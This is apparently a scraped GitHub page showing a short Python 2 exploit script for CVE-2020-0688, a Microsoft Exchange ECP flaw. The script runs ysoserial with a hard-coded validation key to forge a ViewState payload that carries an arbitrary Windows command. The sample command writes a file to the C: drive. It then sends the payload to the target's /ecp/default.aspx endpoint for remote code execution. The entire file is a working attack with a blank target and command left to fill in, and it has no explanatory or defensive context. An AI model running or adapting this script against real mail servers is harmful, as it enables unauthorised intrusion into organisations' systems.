/
cve-2020-0688.py
28 lines (23 loc) · 977 Bytes
/
cve-2020-0688.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
import requests, os
import urllib
url = "https://mail.something.com" #input 1*
command = "cmd /c echo OOOPS!!! > c:/truongtn.txt" #input2*
aspsession = "1111a11c-11ad-1c11-1111-1111122f5977" # input3*
cmd = """ysoserial.exe -p ViewState -g TextFormattingRunProperties -c \
"^^^" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" \
--generator="B97B4E27" --viewstateuserkey="###" --isdebug -islegacy > temp.txt"""
cmd = cmd.replace("###", aspsession)
cmd = cmd.replace("^^^", command)
print cmd
os.system(cmd)
with open("temp.txt", "r") as f:
result = f.readline()
result = f.readline()
result = f.readline()
result = f.readline()
result = f.readline()
result = urllib.quote_plus(result)
final_url = url + "/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=" + result
print final_url
output = requests.get(final_url, verify=False) # execute
print "Done!"